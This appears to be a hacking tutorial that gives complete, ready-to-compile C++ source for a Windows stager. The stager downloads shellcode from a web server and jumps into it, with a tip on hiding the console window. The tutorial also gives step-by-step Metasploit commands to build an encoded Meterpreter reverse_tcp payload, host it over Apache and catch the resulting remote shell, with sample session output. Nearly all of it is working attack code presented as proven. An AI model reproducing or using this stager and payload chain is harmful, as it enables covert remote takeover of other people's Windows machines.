This is not an original idea. please view http://www.securitytube.net/video/2908 and pay respect to Armitage1989
apache server set up
1. Set up a share folder.
mkdir /var/www/share
chmod -R 755 /var/www/share/
chown -R www-data:www-data /var/www/share/
To veiw if sharing type
ls -la /var/www/ | grep share
#########################
2. Start web server
service apache2 start
To shut down simply replace start with stop.
##########################
3. If not installed
apt-get install apache2
##########################
4. Copy files to the share
cp /root/.msf4/data/exploits/* /var/www/share/
–> * was a wildcard that mean I want to select all the folder contents
###########################
5. Access the file from another machine
http://(servers ip)/share
#############################
please watch http://www.securitytube.net/video/2908
Armitage1989 – created the c++ code which was originaly posted at http://pastebin.com/u/armitage1989
down load Dev-C++4.9.9.2 for windows http://www.bloodshed.net/dev/devcpp.html
1. Create new project / Windows Application OK Save location to were you like.
2. Delete all in the development window and paste in the code bellow.
3. Under project window right click on your project and click Project Options (or press Alt+p)
4. under Parameters tab paste in under Linker -lwininet press OK
4. Compile save location to were you like.
Code copy bellow and paste
//include library wininet this have a funtions InternetOpen(),InternetOpenUrl(),InternetReadFile(),InternetCloseHandle(),
#include <windows.h>
#include<iostream>
#include<cstring>
#include<Wininet.h>
using namespace std;
//this is a buffer with shellcode data in .bss section
unsigned char DataReceived[500];
int main(){
int i;
//this configure a HTTP agent to surf
HINTERNET connect = InternetOpen("MyBrowser",INTERNET_OPEN_TYPE_PRECONFIG,NULL, NULL, 0);
//if for validate connection.
if(!connect){
cout<<"Connection Failed or Syntax error";
return 0;
}
//Open a malicious url
HINTERNET OpenAddress = InternetOpenUrl(connect,"http://192.168.16.2/ascii.bin", NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0);
//this check the handler for URL
if ( !OpenAddress )
{
DWORD ErrorNum = GetLastError();
cout<<"Failed to open URL \nError No: "<<ErrorNum;
InternetCloseHandle(connect);
return 0;
}
DWORD NumberOfBytesRead = 0;
//this recovery a file on server and save data into DataReceived
while(InternetReadFile(OpenAddress, DataReceived, 4096, &NumberOfBytesRead) && NumberOfBytesRead )
{
//this print the data in format \x00 you can delete this routine
for(i=0;i<sizeof DataReceived; i++ ){
printf("\\x%02x",DataReceived[i]);
}
/*this routine is a other implementattion of shellcode-test but in this routine i use __asm () directive for call asm intrucctions.
1)first i store a pointer to buffer in EAX register
2)push eax, Pointer to DataReceived in stack now esp point to first 4 bytes of shellcode
3)the ret instruction put the value of esp+4 into eip and pass the execution.
4)finally the shellcode in DataReceived is executed
5)all handler is closed.
NOTA:
you can put a nopsled before shellcode for estabilish execution .
use freeconsole for hidden a Dos Windows
*/
__asm ("lea _DataReceived, %eax");
__asm ("push %eax");
__asm ("ret");
}
InternetCloseHandle(OpenAddress);
InternetCloseHandle(connect);
return 0;
}
############################
please watch http://www.securitytube.net/video/2908
start msfconsole
use multi/handler
set windows/meterpreter/reverse_tcp lhost (ip address) lport (port of choice)
exploit
open new console window and
msfpayload windows/meterpreter/reverse_tcp LHOST=ip address LPORT=port of choice R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b ‘\x00\x0a\x0d’ -c 1 x>/var/www/share/your-file.bin
once the exe is run on the machine the Meterpreter should report a session
meterpreter > execute -f cmd.exe -c
Process 2508 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1…
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
Under script change ip address and location to share if required? “http://192.168.1.2/share/your-file.bin”
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4445 of choice R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b ‘\x00\x0a\x0d’ -c 1 x>/var/www/share/your-file.bin
use multi/handler
set windows/meterpreter/reverse_tcp lhost 192.168.1.2 lport 4445
exploit
Update 100% works
msfpayload windows/meterpreter/reverse_tcp LHOST=ip-address LPORT=4445 of choice R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b ‘\x00\x0a\x0d’ -c 1 x>/var/www/share/myexploit.bin
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IP Address
set lport 4445
exploit